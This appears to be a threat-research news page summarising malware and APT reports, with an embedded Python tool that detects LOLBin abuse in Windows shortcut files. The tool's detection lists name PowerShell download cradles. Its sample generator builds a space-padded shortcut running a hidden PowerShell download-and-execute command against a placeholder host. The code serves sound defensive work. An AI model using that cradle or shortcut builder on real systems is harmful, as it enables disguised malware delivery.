SessionManager is an IIS backdoor tied to the GELSEMIUM activity cluster that persists on compromised servers by loading a malicious IIS module after ProxyLogon-type exploits. It enables reading/writing files, remote command execution, and HTTP-based command-a…
Category: Threat Research
YTStealer is a YouTube authentication cookie stealer marketed on the dark web, designed to harvest credentials and channel data from creators. It evades analysis with sandbox checks, uses headless browser automation to validate cookies and collect YouTube Stud…
Cyble Research Labs uncovered PennyWise, a new evasive infostealer that targets 30+ Chrome-based and 5+ Mozilla-based browsers as well as crypto wallets, with updated version 1.3.4 already observed in the wild. The malware is distributed via YouTube campaigns …
Raccoon Stealer v2 marks a notable revival of the information stealer brand, with early signs of life detected in 2022 as servers and administration panels surfaced. SEKOIA.IO documents a refreshed build, renewed distribution, and a plan to scale behind a rede…
Two Ukrainian targets were hit by emails delivering malicious documents that leveraged a Follina-like vulnerability and malicious macros to drop a DCRat variant. FortiGuard Labs notes the campaign revolves around Dark Crystal RAT (DCRat) with multi-stage infec…
ReversingLabs reports AstraLocker 2.0 is distributed directly from Microsoft Word phishing documents, leveraging leaked Babuk code and a “smash and grab” approach for rapid impact. The campaign uses an old packer, anti-analysis checks, and Monero/BTC wallets f…
The ASEC analysis covers a new info-stealer distribution campaign branded as “Recordbreaker Stealer,” which began in earnest around May 20 and is spread by disguising itself as software cracks/installers. It may be a new version of Raccoon Steal…
ThreatLabz tracks Evilnum APT activity from early 2022, noting a shift to targeted campaigns in UK/Europe FinTech and expanded targets including an intergovernmental migration organization. The updated campaign uses document template injection in MS Office Wor…
Black Basta expanded its repertoire by employing QakBot as an entry point and using the PrintNightmare flaw to perform privileged file operations. It also leveraged the Coroxy backdoor and Netcat for lateral movement across networks. #BlackBasta #QakBot
eSentire’s TRU team uncovered Socgholish, a drive-by social engineering threat that delivers a fake software update, leading to quick Cobalt Strike deployment and persistence. The case highlights how drive-by infections can escalate to hands-on-keyboard intrus…
MuddyWater has maintained a long-term infection campaign targeting Middle East countries since late 2020, with recent samples suggesting it may still be active. The campaign centers on compressed attachments containing Word documents with VBA macros that drop …
Instagram credentials Stealers: Free Followers or Free Likes (McAfee Blog, authored by Dexter Shin): Instagram has become a platform with over a billion monthly active users. Many of Instagram’s users…
Instagram credentials Stealer: Disguised as Mod App (McAfee Blog, authored by Dexter Shin): McAfee’s Mobile Research Team introduced a new Android malware targeting Instagram users who want to increase…
Cyble Research Labs highlights a rise in using Windows .lnk shortcut files to deliver payloads via LOLBins like PowerShell and mshta, including a new “Quantum Builder” tool that can create .lnk, .hta, and .iso-based payloads. The report also notes potential La…
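The .lnk-to-LOLBin delivery pattern in the Cyble item above lends itself to offline triage. What follows is an added example, not code from Cyble or any vendor on this page: a minimal parser for the Shell Link header and StringData sections (per MS-SHLLINK) with heuristics over the target, arguments, icon and ShowCommand fields. The LOLBin list, argument markers and thresholds are this example's own choices, and the two shortcuts it scores are constructed by build_lnk() inside the block rather than taken from real samples.

```python
"""Static triage of Windows .lnk (Shell Link) files for LOLBin abuse.

Added example for this page, not code from Cyble or any vendor. Field layout follows
MS-SHLLINK; LOLBIN names, argument markers and thresholds are this example's own choices.
"""
import struct
from dataclasses import dataclass

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window minimised

LOLBINS = ("powershell", "pwsh", "mshta", "cmd", "rundll32", "regsvr32",
           "wscript", "cscript", "certutil", "msiexec", "bitsadmin", "forfiles")
ARG_MARKERS = ("-enc", "-w hidden", "windowstyle hidden", "-nop", "bypass",
               "iex", "downloadstring", "frombase64string", "http://", "https://")


@dataclass
class LnkStrings:
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""
    show_command: int = 1


def parse_lnk(data: bytes) -> LnkStrings:
    """Parse the ShellLinkHeader and StringData; skip LinkTargetIDList and LinkInfo."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = LnkStrings(show_command=struct.unpack_from("<I", data, 60)[0])
    off = 0x4C
    if flags & HAS_ID_LIST:                      # IDListSize (2 bytes) followed by the item list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts the whole structure
        off += struct.unpack_from("<I", data, off)[0]
    for flag, attr in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                       (HAS_ICON, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        off += count * width
        setattr(info, attr, raw.decode("utf-16-le" if width == 2 else "cp1252", "replace"))
    return info


def triage_lnk(data: bytes) -> list[str]:
    """Return human-readable findings; an empty list means no heuristic fired."""
    s = parse_lnk(data)
    findings = []
    target = s.relative_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    stem = target[:-4] if target.endswith(".exe") else target
    if stem in LOLBINS:
        findings.append(f"target is LOLBin {target}")
        icon = s.icon_location.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if icon and icon != target:              # document-looking icon on a script host
            findings.append(f"icon borrowed from {icon} while launching {target}")
    args = s.arguments.lower()
    findings.extend(f"argument marker {m!r}" for m in ARG_MARKERS if m in args)
    if len(s.arguments) > 260 or "          " in s.arguments:  # pushed out of the Properties view
        findings.append("oversized or space-padded arguments")
    if s.show_command == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand SW_SHOWMINNOACTIVE (window kept minimised)")
    return findings


def build_lnk(relative_path: str, arguments: str = "", icon: str = "", show_command: int = 1) -> bytes:
    """Constructed sample generator for this example (not a real-world file)."""
    flags, body = IS_UNICODE, b""
    for flag, text in ((HAS_REL_PATH, relative_path), (HAS_ARGS, arguments), (HAS_ICON, icon)):
        if text:                                 # StringData order: RelativePath, Arguments, IconLocation
            flags |= flag
            body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + body


# Constructed shortcuts: a PowerShell downloader hiding behind a shell32 icon, and a plain app launcher.
MALICIOUS_LNK = build_lnk(
    relative_path="..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    arguments=" " * 300 + "-w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/stage2.ps1')\"",
    icon="%SystemRoot%\\System32\\shell32.dll",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(relative_path="..\\Program Files\\Notepad++\\notepad++.exe")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, triage_lnk(blob) or "clean")
```

The parser deliberately skips the LinkTargetIDList and LinkInfo blocks instead of resolving them, so a shortcut whose target is expressed only through the IDList (no RelativePath string) would not be scored; a production tool would walk the IDList and also inspect ExtraData, where builders of the kind Cyble describes sometimes leave environment-variable and property-store targets.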
ToddyCat is a recently identified APT that uses two previously unknown tools, Samurai backdoor and Ninja Trojan, to target high-profile entities in Europe and Asia since December 2020. The operation began with Exchange server compromises and a China Chopper we…